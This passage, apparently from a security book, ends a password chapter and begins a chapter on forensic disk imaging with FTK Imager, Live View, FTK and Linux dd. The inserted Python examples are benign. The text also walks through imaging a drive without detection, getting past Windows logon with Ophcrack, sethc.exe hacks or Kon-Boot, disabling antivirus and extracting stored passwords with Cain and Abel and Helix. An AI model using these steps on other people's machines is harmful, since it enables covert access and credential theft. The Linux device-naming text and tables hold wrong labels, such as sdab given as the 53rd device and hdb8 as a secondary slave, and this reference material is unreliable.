> Windows Components, System. Right (Vista/2008/7): Local Computer Policy > Computer 
Configuration > Administrative Templates > Control Panel, Network, Printers, System, Windows 
Components > ActiveX Installer Service, Application Compatibility, AutoPlay Policies.] 


On the Turn off AutoPlay Properties box, click the Enabled radio button. This will turn off 
autoplay for all drives. 
[Screenshot: Turn off Autoplay Properties, Setting tab: Not Configured / Enabled (selected) / 
Disabled. Turn off Autoplay on: All drives. Supported on: At least Microsoft Windows 2000. 
Previous Setting / Next Setting.] 
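The policy above is stored as a registry bitmask, and the bits say which drive types it covers. As an added example (not from the book), the functions below decode that value (NoDriveTypeAutoRun under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer; the "All drives" policy option writes 0xFF) and list the drive types on which autorun is still active, so a setting short of "All drives" is visible at a glance; on Windows the last function also reads the live value. The per-bit names follow the Windows DRIVE_* drive-type constants; 0x91 is the out-of-the-box value on Vista and later (0x95 on XP) and 0xB5 is what the policy's "CD-ROM and removable media drives" option writes.

```python
# Drive-type bits of the NoDriveTypeAutoRun value; a SET bit disables autorun
# for that drive type. Names follow the Windows DRIVE_* constants.
DRIVE_TYPE_BITS = {
    0x01: "unknown type",
    0x02: "no root directory",
    0x04: "removable (USB sticks, floppies)",
    0x08: "fixed (internal hard disks)",
    0x10: "network",
    0x20: "CD-ROM/DVD",
    0x40: "RAM disk",
    0x80: "reserved",
}
ALL_DRIVES = 0xFF            # written by the "Turn off AutoPlay: All drives" policy option
CDROM_AND_REMOVABLE = 0xB5   # the policy's "CD-ROM and removable media drives" option
VISTA_DEFAULT = 0x91         # out-of-the-box value on Vista and later (0x95 on XP)

POLICY_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"
VALUE_NAME = "NoDriveTypeAutoRun"


def drive_types_still_autorunning(mask):
    """Drive types whose bit is clear, i.e. where autorun remains enabled."""
    return [name for bit, name in DRIVE_TYPE_BITS.items() if not mask & bit]


def assess(mask):
    """Compliance with the 'All drives' setting, plus what is still exposed."""
    return {
        "compliant": (mask & ALL_DRIVES) == ALL_DRIVES,
        "autorun_enabled_for": drive_types_still_autorunning(mask),
    }


def read_policy_value():
    """Read the live value on Windows (machine policy first, then user policy).

    Returns None when the value is absent or when not running on Windows.
    """
    try:
        import winreg
    except ImportError:
        return None
    for hive in (winreg.HKEY_LOCAL_MACHINE, winreg.HKEY_CURRENT_USER):
        try:
            with winreg.OpenKey(hive, POLICY_KEY) as key:
                value, _type = winreg.QueryValueEx(key, VALUE_NAME)
                return int(value)
        except OSError:
            continue
    return None


if __name__ == "__main__":
    for label, mask in (("Vista default", VISTA_DEFAULT),
                        ("CD-ROM and removable", CDROM_AND_REMOVABLE),
                        ("All drives", ALL_DRIVES)):
        print(f"{label} (0x{mask:02X}): {assess(mask)}")
    live = read_policy_value()
    print("live policy value:", f"0x{live:02X}" if live is not None else "not set / not Windows")
```

The point of decoding rather than comparing against 0xFF alone is that the weaker settings are not obviously weak: 0xB5 reads as "CD-ROM and removable" in the policy editor, yet it leaves fixed disks and RAM disks autorunning, and the default 0x91 leaves USB sticks autorunning, which is exactly the U3 case above.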


Summary 


Passwords are extremely valuable in protecting any information that is stored electronically. While 
many computer applications may use encryption and claim that it will take 100 million years to 
break the encryption, the applications are often only as strong as the password the user chooses. 
Passwords should have a minimum length of 8 characters and have a combination of uppercase 
characters, lowercase characters, and special characters. 

Even the most secure passwords can be revealed if users allow hackers to get physical or remote 
access to their systems. There are tools out there like Cain and Abel, FGDUMP, and PWDUMP, 
which will dump the password hashes. Once a user has the password hashes from a Windows 
operating system, they can use tools like the rainbow tables or the website nediam.com.mx to find 
the passwords for the corresponding hashes. 

Other risks associated with passwords include the fact that they can be captured by software 
and hardware key loggers. And, as you will find out in the next chapter, forensic tools can be used 
to recover passwords from the page file and hibernation file of various operating systems. 


Chapter 3 


Imaging and Extraction 


Introduction 


Computer forensics is one of the fastest growing fields in information technology. The reason for 
this is almost everything is being electronically stored on some type of media. People’s personal 
computers contain a wealth of information about the individuals that use them. Items such as 
photographs, browser history, usernames, passwords, Word documents, and Excel spreadsheets 
can reveal a lot of facts about an individual’s identity and life. A company’s computers can con- 
tain databases with customers’ names, addresses, social security numbers, and information about 
credit card accounts. Storage of electronic media goes well beyond computers. People store music, 
videos, emails, and contact lists on their iPhones and other mobile devices. Individuals can also 
store information on gaming consoles like the PlayStation 3, which comes with a hard drive. 
Finally, some of the newer cars like BMWs come with a hard drive. As our society continues to 
move away from paper records and relies on electronic devices to store their information, the abil- 
ity to extract that information becomes more critical. 

Computer forensics tools are used by law enforcement to examine what is on the media of 
a person suspected of committing a crime. The evidence could either help to convict or exoner- 
ate that person. Examiners will look at documents, pictures, emails, videos, browsing history, 
and any other type of artifact you can find on a computer. What is also important is not just 
what people store, but what they try to hide. Not only will examiners look at what the suspect 
had in their recycle bin, they will also look at the user's deleted files and folders, if they can be 
recovered. 

Hackers can use the techniques of computer forensic examiners to wreak havoc on an indi- 
vidual or a company. By making a forensic image of a person’s hard drive, an attacker can have a 
bit-by-bit copy of that person’s data. This will include every file and folder on that hard drive as 
well as the recoverable deleted files and folders. The worst part is, if properly executed, a person 
would not be able to know that their drive had been accessed. Once a drive has been imaged, the 
attacker can then use an open source tool called Live View to boot that image and view that per- 
son's operating system in a virtualized environment. If a person can make a forensic copy of a hard 
drive, they will have unfettered access to all information stored on that system. 
Computer Forensic Tools 


There are both open source and commercial computer forensic tools. Some commercial 
computer forensic tools tend to be extremely expensive and could wind up setting a person 
back several hundred or thousand dollars. Some of the most commonly used commercial tools 
include EnCase from Guidance Software, FTK from Access Data, and X-Ways Forensic from 
X-Ways Software Technology AG. There are two good open source tools that allow you to 
perform forensic analysis of an image, PTK and Autopsy. Unfortunately, the open source tools 
are more difficult to configure and use and do not have nearly as many features as the com- 
mercial ones. 


Imaging with FTK Imager 


There are several tools that can be used to make a forensic copy of a drive. Some of these tools 
are command line utilities while others are graphical user interface (GUI) based. There are 
several reasons for making a forensic copy of a hard disk or other media. After an “image” has 
been made, the examination is performed on the forensic copy, not the original media. If the 
original is altered or changed after the time of the acquisition, the original state of the evidence 
at the time it was acquired would be preserved. 

The next question that is logical to ask is "If someone within law enforcement copies your drive 
and examines the copy, how do we know they did not plant the evidence?" 

After the media has been acquired, it can be hashed. Hashing runs the acquired data through a 
one-way mathematical function that produces a fixed-length value, written in hexadecimal. If the 
hash value is the same for the original media and the copied media, the images are forensically 
equivalent. 
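Here is what that verification looks like in code, as an added example that is not from the book or from FTK Imager: it hashes a source and its copy in fixed-size chunks (so an image of hundreds of gigabytes never has to fit in memory), computes MD5 and SHA-1 in a single pass the way imaging tools do, and compares the digests. The "media" is a constructed pseudo-random buffer; one copy is faithful and the other has a single bit flipped, which is enough to change every digest.

```python
import hashlib
import io
import random

CHUNK = 1 << 20  # read 1 MiB at a time; a disk image never has to fit in RAM


def hash_stream(fileobj, algorithms=("md5", "sha1")):
    """Compute several digests over a file-like object in one pass.

    Returns {algorithm name: hex digest}. Imaging tools compute MD5 and
    SHA-1 together so the media only has to be read once.
    """
    hashers = {name: hashlib.new(name) for name in algorithms}
    while True:
        block = fileobj.read(CHUNK)
        if not block:
            break
        for h in hashers.values():
            h.update(block)
    return {name: h.hexdigest() for name, h in hashers.items()}


def hash_bytes(data, algorithms=("md5", "sha1")):
    """Convenience wrapper for in-memory data (used for the constructed media)."""
    return hash_stream(io.BytesIO(data), algorithms)


def hash_file(path, algorithms=("md5", "sha1")):
    """Hash a real image file on disk, e.g. the firstimage.dd written by FTK Imager."""
    with open(path, "rb") as f:
        return hash_stream(f, algorithms)


def verify_image(source_digests, image_digests):
    """An acquisition verifies only if every algorithm agrees.

    Returns {"verified": bool, "mismatched": [algorithm, ...]}.
    """
    mismatched = sorted(
        name for name, value in source_digests.items()
        if image_digests.get(name) != value
    )
    return {"verified": not mismatched, "mismatched": mismatched}


# Constructed stand-in for the source media: 3 MiB plus a partial chunk of
# deterministic pseudo-random bytes (fixed seed so the results are reproducible).
_SIZE = 3 * 1024 * 1024 + 517
_rng = random.Random(2009)
SOURCE_MEDIA = _rng.getrandbits(8 * _SIZE).to_bytes(_SIZE, "big")

FAITHFUL_COPY = bytes(SOURCE_MEDIA)  # a bit-for-bit acquisition

_tampered = bytearray(SOURCE_MEDIA)
_tampered[1_000_000] ^= 0x01         # one flipped bit, deep inside the image
TAMPERED_COPY = bytes(_tampered)


def demo():
    """Verify both copies against the source; returns (faithful_result, tampered_result)."""
    source = hash_bytes(SOURCE_MEDIA)
    return (
        verify_image(source, hash_bytes(FAITHFUL_COPY)),
        verify_image(source, hash_bytes(TAMPERED_COPY)),
    )


if __name__ == "__main__":
    good, bad = demo()
    print("faithful copy:", good)
    print("tampered copy:", bad)
```

This is the computation the "Verify images after they are created" option in the imaging steps below performs: leaving it unchecked saves the second read of the media, at the cost of having no evidence that the copy matches the original.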

If you are not very comfortable with Linux or the command line, there are some GUI tools 
that can be used to acquire an image of a disk. FTK Imager Lite from Access Data is a tool you 
can use within Windows that will allow you to make a physical copy of a disk. It is available 
for download at the following link from the Access Data website: http://www.accessdata.com/ 
downloads/current_releases/imager/Imager%20Lite%202.6.1.zip. In order to make a copy, you 
will need an external USB drive. I bought one that holds a terabyte of data (1024 GB) at Costco 
for about $100. The drive you use to store the image should always be greater than or equal to 
the size of the disk you are imaging. In order to accommodate large image sizes, use the NTFS 
file system on the disk. If the disk is blank you can right click on it and format it NTFS in 
Windows. 


Note: Never make forensic copies of someone else’s media without their permission or the proper 
legal authority. 


The following steps are needed to make a copy of a disk using FTK Imager Lite: 


1. Download the FTK Imager Lite program from the Access Data website to your external 
hard disk. Unzip the program so it is usable. 

2. Double click on the FTK Imager file. 

3. From the File menu, select Create Disk Image. This will allow you to take a physical or logi- 
cal image of the disk. A physical image will be larger but may include additional items that 
the user attempted to delete. 
[Screenshot: AccessData FTK Imager 2.6.1.62, Select Source: Please Select the Source Evidence 
Type: Physical Drive (selected), Logical Drive, Image File, Contents of a Folder (logical file-level 
analysis only; excludes deleted, unallocated, etc.), Fernico Device (multiple CD/DVD).] 


5. At the Select Drive screen, select the drive you want to make an image of. This is usually 
labeled PHYSICALDRIVEO. Click Finish. 


[Screenshot: Select Drive, Source Drive Selection: Please select from the following available 
drives: \\.\PHYSICALDRIVE0 - VMware Virtual IDE Hard Drive. Back / Cancel / Help.] 


6. At the Create Image screen, click the Add button. Removing the verify check will save lots 
of time if you are in a hurry. 
[Screenshot: Create Image: Verify images after they are created (checked); Precalculate Progress 
Statistics; Create directory listings of all files in the image after they are created.] 


7. At the Select Image Type screen, select Raw(dd). A dd image is a bit-by-bit copy. An E01 
image is a proprietary format developed by Guidance Software. 


[Screenshot: Select Image Type: Please Select the Destination Image Type: Raw (dd) (selected), 
SMART, E01.] 


8. Click Next at the Evidence Item screen (unless you are doing an acquisition for an agency 
that requires such data). 

9. At the Select Image Destination screen, browse to the root of your USB mass storage device. 
For the filename, put firstimage.dd. Specify 0 for image fragment size. If your USB mass 
storage device was FAT32, you could split the image up because FAT32 has a file size limit 
of slightly less than 4 GB. Click Finish. 


[Screenshot: Select Image Destination: Image Fragment Size (MB): 0 (For Raw and E01 formats: 
0 = do not fragment); Compression (0=None, 1=Fastest, ..., 9=Smallest).] 
10. Remove the check next to "Verify images after they are created" and click Start. 


[Screenshot: Create Image: Image Source \\.\PHYSICALDRIVE0; Image Destination(s): 
E:\firstimage.dd [raw/dd]; Add / Edit / Remove; Verify images after they are created (unchecked); 
Precalculate Progress Statistics; Create directory listings of all files in the image after they are 
created; Start.] 


Live View 


Live View works with most versions of Windows as well as Linux and Mac OS X. Once a dd image 
has been created, you can use a tool called Live View to boot the image up into a VMware 
environment. Booting the image will allow you to browse through the files and folders on the 
system. However, you will not be able to view deleted files within the image. To view the deleted 
files within the dd image, you will need a forensic tool like FTK, PTK, Autopsy, EnCase, or X-Ways. 

Perform the following steps prior to installing Live View: 


1. Download and install Java from Sun Microsystems at the following link: 
http://javadl.sun.com/webapps/download/AutoDL?BundleId=34066. 

2. Download the VMware Virtual Disk Development Kit from VMware at the following link: 
http://www.vmware.com/support/developer/vddk/. Click on the Download VDDK link. If you 
are a new user to the VMware site, you will need to register so you can get access to that download. 

3. After you register and log in, click the Yes radio button to agree to the EULA. Download the 
EXE for Windows. 

4. Double click on the VDDK install file. 

5. Click Next at the Welcome screen for VMware VDDK. 


[Screenshot: VMware Virtual Disk Development Kit installer: Welcome to the installer for VMware 
Virtual Disk Development Kit. The installer will install VMware Virtual Disk Development Kit on 
your computer. To continue, click Next. Followed by the standard copyright warning.] 
6. Read the terms of the license agreement and click Accept if you accept them. Click Next. 
7. Click Next to accept the default installation location. 

8. Click Install. 

9. Click Finish at the Installer Complete screen. 


Perform the following steps to install Live View: 


1. Download Live View from the Sourceforge at the following link: http://sourceforge.net/ 
projects/liveview/files/ (get the latest public installer EXE file). 

2. Double click on the Live View Installer file. 

3. Click Next at the Setup Wizard. 


[Screenshot: Live View 0.7b Setup: Welcome to the Live View 0.7b Setup Wizard. This wizard 
will guide you through the installation of Live View 0.7b. It is recommended that you close all 
other applications before starting Setup. This will make it possible to update relevant system files 
without having to reboot your computer. Click Next to continue.] 


4. Read over the license agreement and click "I agree" if you agree. 

5. Click Next to choose the default installation location. If you already have VMware installed 
on your system, skip the rest of the steps. If no instance of VMware is installed on your 
system, click OK and a copy of VMware Server will be downloaded to your system. This is 
a free product but you must go to the VMware website (http://www.vmware.com) to register 
and get a serial number for your free product. 
[Screenshot: Live View 0.7b Setup notice: the free VMware Server will now be downloaded and 
installed because no compatible VMware installation could be found. OK.] 


6. Click Next at the VMware Server install screen. 


[Screenshot: VMware Server installer: Welcome to the installation wizard for VMware Server. The 
installation wizard will install VMware Server components on your computer. To continue, click 
Next. Followed by the standard copyright warning.] 


7. Click “I accept the terms” in the license agreement if you accept them. 
8. Verify the Complete radio button has been selected and click Next. 
9. Click OK if you receive an error about IIS (Internet Information Services). 
10. Click Next to accept the default destination folder. 
11. Click Next to the warning about Autorun. 
12. Click Install. 
13. Enter your serial number and click the Enter radio button. 
14. Click Finish for VMware Server, then click Finish for Live View. 


Perform the following steps to boot the image up using the Live View program: 


1. Double click on the LiveView icon on your desktop. 
2. Select 512 MB for the RAM size field. 

3. Select the operating system. 

4. Browse to the location of the image file. 


Note: If you are using Vista or Windows 7 and have user account control (UAC) enabled, store 
the image in the Public folder. 


5. Select an empty directory for the VM config files. 
6. Click Start. 
7. Click No to make image file read only. 
[Screenshot: Live View main window: RAM Size: 512; Microsoft Windows XP; Select Your Image 
or Disk: Image File(s) (selected) / Physical Disk: I:\firstimage.dd.001; Select Output Directory 
For VM Config Files: C:\xp; What do you want to do? Launch My Image (selected) / Generate 
Config Only.] 


Perform the following steps to add a network card and VMware tools to the virtual machine: 


1. Power the machine off. 


2. Add a network card by clicking Edit Virtual Machine Settings and clicking Add, select the 
network adapter, click Next, and choose 
   a. NAT or bridged if you want the machine on the Internet. Click Finish. 
   b. Host-only if you do not want the machine on the Internet. Click Finish. 

[Screenshot: Add Hardware Wizard, hardware types: Hard Disk, CD/DVD Drive, Floppy Drive, 
Network Adapter, Sound Card, USB Controller, Serial Port, Parallel Port, Generic SCSI Device.] 
3. Click OK, then power on this virtual machine. 


[Screenshot: VMware Server console with the booted virtual machine at the Windows welcome 
screen.] 


4. At this point, if there is a password required for logon, you will need to boot to a Live CD. 
To do this, power off the virtual machine by hitting the square red button under the File 
menu. Double click the CD/DVD icon under Devices. Click the Use ISO image file radio 
button, click Browse, and locate the ISO image of Ophcrack on your system. Click OK. 


[Screenshot: CD/DVD device settings. Device status: Connected (checked), Connect at power on 
(checked). Connection: Use physical drive (Auto detect) / Use ISO image file (selected), pointing at 
the Ophcrack XP LiveCD ISO, Browse.] 
6. Click Power on this virtual machine, then immediately click your mouse in the VM window 
and hit the F2 key until you enter the BIOS screen. Go over to Boot. Select the CD-ROM 
drive and click the + key two times. Press F10 to save and exit. Select Yes to save configura- 
tion changes now and exit. 

[Screenshot: BIOS Boot menu showing the CD-ROM Drive entry.] 


If Ophcrack does not find the password, you can use the sethc.exe or Utilman.exe hacks 
from Chapter 1 to gain system access and reset the password. Or, just use the Kon-Boot CD 
to log in without having the password. 


7. After the system starts up and you log on, from the menu, select VM and choose Install 
VMware Tools. The VMware Tools will allow you to move files in and out of the virtual 
machine. Reboot after you have installed them. 

8. Drag any files you need from the VM into your host system. 


Perform the following steps to extract usernames and passwords from the VM: 


1. On your host machine, download Cain and Abel from oxid.it at the following link: 
http://www.oxid.it/downloads/ca_setup.exe. 

2. Drag the setup file into the VM. Disable any AV if it is on in the VM. 

3. Run the Cain and Abel setup program. 

4. Open the Cain program. 

5. Under the area of cached passwords, click the blue plus sign to find usernames and pass- 
words. Try other areas such as LSA Secrets, Wireless Passwords, IE7 Passwords, Windows 
Mail Passwords, and so on. 


[Screenshot: Cain, cached passwords view listing Outlook Express entries (Deleted Account, HTTP 
Mail Account, SMTP Account, POP3 Account, NNTP Account).] 
6. If you are unable to find any passwords, another tool like Helix can be used. To use Helix, 
right click on the small CD-ROM icon in the right hand corner of the VM and select Settings. 
Select the Use ISO image file radio button, and click Browse. Locate the Helix2009R1.iso 
file and double click on it. 

7. When Helix auto launches, click Accept to the license agreement. Click on the third icon 
from the top, and browse to the third page of the incident response tools. 


[Screenshot: HELIX2009R1 (01/06/2009) menu, Incident Response page.] 


8. Cycle through the different password viewers until you recover any usernames and passwords. 


[Screenshot: Network Password Recovery tool listing stored entries with their Last Written 
timestamps.] 


While Live View is a very useful forensic tool, it will not allow you to recover any files that were 
deleted or items in slack space. In order to recover those types of items, we will need a forensic tool 
like EnCase, FTK, PTK, X-Ways, or Autopsy. 


Deleted Files and Slack Space 


When items are deleted from a file system, they are not really deleted. Instead, the space the 
file occupies is marked as available on the disk. Forensic tools can be used to recover those 
files if a new file has not yet been stored in the area where the previous file existed. Once a 
new file has been written to the area of the disk that the previous file occupied, the file cannot 
be fully recovered. That is one reason why when people ask me to recover their deleted files, 
I tell them to leave their computer alone until I get there. Any activity on the disk might cause 
new files to overwrite the available space on the disk where the deleted file was originally stored. 

Slack space on a disk often winds up being a goldmine for computer forensics investigators. 
Conversely, slack space often winds up being the Achilles' heel for criminals. A sector, usually 
512 bytes, is the smallest unit of a disk that can be addressed by the disk controller. In contrast, 
the operating system writes to a cluster. Clusters are usually comprised of several sectors (the 
number of sectors can vary based on the file system). Let's say that for our example, clusters on a 
particular operating system are 4K, or 4096 bytes. A file that is 8000 bytes will take up two clusters, 
as seen in Figure 3.1. 

If the file is deleted off the disk, the space in these clusters will be marked available. If the 
next file put in these clusters is 4097 bytes, then 3904 bytes of the original file will remain in the 
second cluster (8000 - 4096 = 3904 bytes). Figure 3.2 illustrates the part of the file that will be left 
in slack space. 

Even though it may seem odd that you are able to pull data out from “part” of the file, it can be 
done. Forensic tools will often pull out data from files you deleted months or even years ago. You 
will often be surprised what kind of information you can pull from the slack space. 
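As an added illustration (not from the book), the following Python models a disk with 4096-byte clusters and replays the scenario of Figures 3.1 and 3.2: an 8000-byte file is written and deleted, then a 4097-byte file lands in the same two clusters. It then counts how many bytes of the old file are still readable in the new file's slack; the cluster size, file names and marker bytes are constructed for the example.

```python
# Added example, not from the book: a toy cluster-allocated disk used to show
# what survives in slack space after a deleted file's clusters are reused.
CLUSTER = 4096   # cluster size assumed in the text (4K)


class ClusterDisk:
    def __init__(self, clusters):
        self.data = bytearray(clusters * CLUSTER)   # raw contents of every cluster
        self.free = set(range(clusters))            # allocation map: clusters marked available
        self.files = {}                             # name -> (cluster list, logical size)

    def write(self, name, payload):
        need = (len(payload) + CLUSTER - 1) // CLUSTER   # round up to whole clusters
        chosen = sorted(self.free)[:need]
        if len(chosen) < need:
            raise OSError("disk full")
        for i, c in enumerate(chosen):
            chunk = payload[i * CLUSTER:(i + 1) * CLUSTER]
            # Only len(chunk) bytes are overwritten; the rest of the cluster
            # keeps whatever the previous occupant left behind.
            self.data[c * CLUSTER:c * CLUSTER + len(chunk)] = chunk
            self.free.discard(c)
        self.files[name] = (chosen, len(payload))
        return chosen

    def delete(self, name):
        clusters, _ = self.files.pop(name)
        self.free.update(clusters)   # space marked available; contents untouched

    def slack(self, name):
        """Bytes of the file's last cluster that lie past the file's logical end."""
        clusters, size = self.files[name]
        used_in_last = size - (len(clusters) - 1) * CLUSTER
        last = clusters[-1]
        return bytes(self.data[last * CLUSTER + used_in_last:(last + 1) * CLUSTER])


def replay_figures():
    """Scenario of Figures 3.1 and 3.2: 8000-byte file, deleted, then a 4097-byte file."""
    disk = ClusterDisk(clusters=4)
    old_marker, new_marker = 0xAA, 0x55                  # constructed, recognisable contents
    disk.write("old.txt", bytes([old_marker]) * 8000)    # two clusters, as in Figure 3.1
    disk.delete("old.txt")                               # marked available, not wiped
    new_clusters = disk.write("new.txt", bytes([new_marker]) * 4097)  # 4096 + 1 byte
    slack = disk.slack("new.txt")
    return {
        "new_file_clusters": len(new_clusters),
        "slack_bytes": len(slack),                        # 4096 - 1 = 4095
        # 3904 old bytes sat in the second cluster; the new file's single byte
        # overwrote exactly one of them, so 3903 remain readable in slack.
        "old_bytes_recoverable": slack.count(old_marker),
    }
```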


Forensic Tool Kit 


Forensic Tool Kit (FTK) is a software forensic tool that will allow you to load an image. You 
can download the tool from the following link to try it: http://www.accessdata.com/downloads/ 
current_releases/ftk/FTK-Forensic_Toolkit-1.81.5.exe. While FTK is not a free product, you can 
examine 5000 items without having a dongle. This feature allows you to test the product and 
purchase it later if you like it. 


[Figure 3.1 drawing: two 4096-byte clusters, 8192 bytes in total.] 

Figure 3.1 Two clusters. 


[Figure 3.2 drawing: two 4096-byte clusters, 8192 bytes in total, labeled "4097 bytes" and "3904 Slack Space".] 

Figure 3.2 Slack space illustrated. 
Perform the following steps to install FTK: 


1. Double click on the FTK-Forensic_Toolkit-1.81.5.exe file. 

2. Click Next at the Install Shield Wizard screen. 

3. Read the license agreement over and click "I accept" if you accept it. Click Next. 

4. Click Next to accept the default destination location. 

5. Ensure that Run the Forensic Tool Kit is checked and click Finish. 

6. Click OK to continue loading FTK without the KFF hash library. 

7. Click OK to the demonstration warning. Click OK if you get another error. 

8. Click Start a new case. 



9. Enter an investigator name, a case number, and a case name and click Next. 

10. Click Next to Forensic Examiner Information. 

11. Click Next to Case Log Options. 

12. Click Next to Processes to Perform. 

13. Click Next to Refine Case—Default. 

14. Click Next to Refine Index—Default. 

15. At the Add Evidence screen, click the Add Evidence to Case button. Verify that Acquired 
Image of Drive is selected and click Continue. 




16. Browse to your firstimage.dd file and click OK. 


17. Click Next and Finish. Wait for the image to load in the case. If there are more than 5000 
items in the image, they will not all load because this is a demo version. 




18. Click Deleted Files to view files that the user deleted and are still present on the disk. You 
can often tell a lot about someone by viewing their deleted files. 


Imaging with Linux dd 


The dd program can be used to make a bit-by-bit copy of media. With a bit-by-bit copy, even items 
in slack space and your deleted files and folders will be copied to your destination media. Using 
the dd program is not as easy as using FTK Imager, because you need to be comfortable with the 
command line as well as Linux drive letter and partitioning schemes. If you follow some basic 
recommended guidelines, you will be able to easily image a person's drive. When a person's drive 
is imaged correctly using dd from a Linux CD, there is virtually no way to detect that the drive 
has been imaged. However, you need to be extremely careful when you are imaging or you could 
wind up accidentally overwriting the drive you are trying to copy. 

In this example, I will take an image of a system running Windows 7. The directions for imag- 
ing all other operating systems are pretty much the same. Even a Mac can be imaged using similar 
techniques. Before you image a system, you will need to download an ISO image that will allow 
you to boot to a Live CD. 


Understanding How Linux Recognizes Devices 


To use most computer forensics tools effectively, it is imperative that you understand how Linux 
recognizes devices. When you are performing an acquisition of a drive, it is extremely important 
that you grasp how Linux designates drive letter assignments. If you do not have a good grasp of 
Linux drive and partition schemes, you could wind up deleting the drive. 

While many Windows users initially find Linux drive designations hard to work with, they 
eventually come to understand how straightforward the process is in Linux. In contrast, when you 
insert a drive into a Windows system, you never know what letter is going to be assigned to the 
device. The Linux drive lettering and partitioning process is both sequential and predictable. Once 
you understand how Linux recognizes devices, you will appreciate the control that Linux provides 
the user for managing devices on the system. 

Linux uses different naming conventions for floppies, IDE hard disks, and small computer 
systems interface (SCSI), SATA, and USB drives. It is important to understand these differences 
so you are able to correctly identify the source drive and the destination drive, or target. If you 
make a mistake, you could wind up erasing the original drive. And, yes, I have seen this done. 

The floppy naming conventions are very straightforward (see Table 3.1). In Linux, there can 
be up to 10 floppy drives for some reason. I have personally never seen more than two in a com- 
puter connected to the motherboard controller. USB floppy devices are seen as USB devices, not 
floppies. 

It is important to note that the IDE naming conventions will only be used through Linux 
kernel 2.6.21. In Linux distributions with a kernel newer than 2.6.21, everything will use the 
SCSI naming conventions. The likely reason for phasing out the IDE naming conventions is 
that IDE drives are being phased out and replaced by SATA drives. 


Table 3.1 Linux Floppy Drive Designations 


/dev/fd0 First floppy drive 
/dev/fd1 Second floppy drive 
/dev/fd4 Fifth floppy drive 
/dev/fd9 Tenth floppy drive 
Typically, older computer systems have two IDE controllers, referred to as the primary and 
secondary controllers. Each controller can support up to two devices. If two devices are attached 
on a single IDE cable to the controller, one of the devices is labeled “master” and the other device 
is labeled "slave." Jumpers on the drive are used to configure the master or slave designation. 

There are four drive letter designations for an IDE drive, hda through hdd (see Table 3.2). The 
primary master drive in Linux is labeled hda; the primary slave drive is labeled hdb. The secondary 
master is labeled hdc; the secondary slave is labeled hdd. 

SCSI devices are still available today but not as common as they once were in the past. You 
will often see SCSI devices in server environments. The naming convention for SCSI devices is 
fairly simple. The SCSI naming convention applies to SCSI devices, as well as SATA and USB 
drives. And, the SCSI naming convention will also apply to IDE devices in Linux kernels 2.6.21 
and later. 

The first SCSI, SATA, or USB device is labeled sda. The second SCSI, SATA, or USB device 
is labeled sdb, the third SCSI, SATA, or USB device is labeled sdc, and so on. The 25th device is 
labeled sdy and the 26th is labeled sdz. Twenty-six drive letters is the maximum you can have in 
Microsoft Windows, but Linux allows for up to 676. The 27th device is labeled aa, and the 52nd 
device is az. The 53rd device is labeled bb and the 676th device is labeled zz (see Table 3.3). 

Each drive in Linux can have either four primary partitions or three primary partitions and 
one extended. Within that extended partition, you can have several logical drives. Partitions are 
numbered 1-4 and logical drives start at 5. The first partition is labeled 1, the second partition 
is 2, the third partition is 3, and the fourth partition is 4. These partitions can be primary or 
extended. However, you can only have one extended partition. The extended partition is the place 
in which the logical drives are created. The number 5 designates the first logical drive, 6 designates 
the second logical drive, 7 designates the third logical drive, and so on. Anything numbered 1-4 


Table 3.2 Linux IDE Drive Designations 


/dev/hda Primary master IDE 
/dev/hdb Primary slave IDE 
/dev/hdc Secondary master IDE 
/dev/hdd Secondary slave IDE 


Table 3.3 Linux SCSI Drive Designations 


/dev/sda First SCSI/SATA/USB device 
/dev/sdb Second SCSI/SATA/USB device 
/dev/sdz 26th SCSI/SATA/USB device 
/dev/sdaa 27th SCSI/SATA/USB device 
/dev/sdaz 52nd SCSI/SATA/USB device 
/dev/sdab 53rd SCSI/SATA/USB device 
/dev/sdzz 676th SCSI/SATA/USB device 
is a partition (primary or extended). Anything 5 or above is a logical drive. Logical drives reside 
in the extended partition. 

So, if a drive is labeled hda1, the 1 designates the first partition on that primary master IDE 
drive. If a drive is labeled hdc5, that is the first logical drive on the secondary master. A designation 
of sdb3 means the third partition on the second SCSI/SATA/USB drive. A designation of sde8 
means the fourth logical partition on the fifth SCSI/SATA/USB drive. With practice, you will 
master it! Some examples are shown in Table 3.4. 

Many of you may think you have used fdisk before because you used a program with a similar 
name in early versions of Windows. The fdisk in Windows is not the same program at all; the old 
Windows version of fdisk could never dream of doing things that the Linux program can do! For 
one, the Windows fdisk program will not see the entire drive on media with a large capacity. The 
Linux fdisk program is capable of seeing drives that are terabytes in size. The Windows fdisk 
program has two choices for file systems, FAT16 and FAT32. The Linux fdisk program supports over 
80 different file systems! And finally, the Linux fdisk program allows you to partition a thumb 
drive. You cannot partition a thumb drive at all on most versions of Microsoft Windows! On 
Linux, completing a task like partitioning a thumb drive is no problem. 


Table 3.4 Linux Drive and Partition Designations 


hda1 First partition, primary master IDE device 
hdd5 First logical drive, secondary slave IDE device 
sdd1 First partition, fourth SCSI/SATA/USB device 
sdc6 Second logical drive, third SCSI/SATA/USB device 
hdb4 Fourth partition, primary slave IDE device 
sdz11 Seventh logical drive, 26th SCSI/SATA/USB device 
hdb8 Fourth logical drive, secondary slave IDE device 
sdaa5 First logical drive, 27th SCSI/SATA/USB device 
sdf7 Third logical drive, sixth SCSI/SATA/USB device 
sdt6 Second logical drive, 20th SCSI/SATA/USB device 
hdb4 Fourth partition, primary slave IDE device 
hdb2 Second partition, primary slave IDE device 
hdb3 Third partition, primary slave IDE device 
hdc6 Second logical drive, secondary master IDE device 
sde4 Fourth partition, fifth SCSI/SATA/USB device 
sdc10 Sixth logical drive, third SCSI/SATA/USB device 
hdc4 Fourth partition, secondary master IDE device 
sdp3 Third partition, 16th SCSI/SATA/USB device 
The fdisk command is extremely important when you are trying to determine what drives are 
in a system. It will be one of the most utilized commands when you perform computer forensic 
acquisitions. The fdisk command is used to view a list of the drives in your system. The command 
will also help you determine what partitions and logical drives exist on each disk in the system. 

The fdisk command will give you information about the drives in your system. There is a trick 
to using fdisk that will make computer forensics acquisitions easier. Type fdisk -l to view what 
drives are in the system. Then add your acquisition (or target) drive and type fdisk -l a second 
time. You will be able to determine what your acquisition drive is by examining the new device 
displayed by the fdisk command. 

Perform the following steps to examine the disks on your system in Linux: 


1. Boot up to BackTrack 4 Beta on your Windows system. 
2. Type fdisk -l to view the disks and partitions on your system. 




If I add an acquisition drive that is a USB mass storage device and type the fdisk -l command 
again, the new entry in the output tells me which designation my target drive has received. 


The new target drive is highlighted in red. Notice the first time fdisk -l was typed that the 
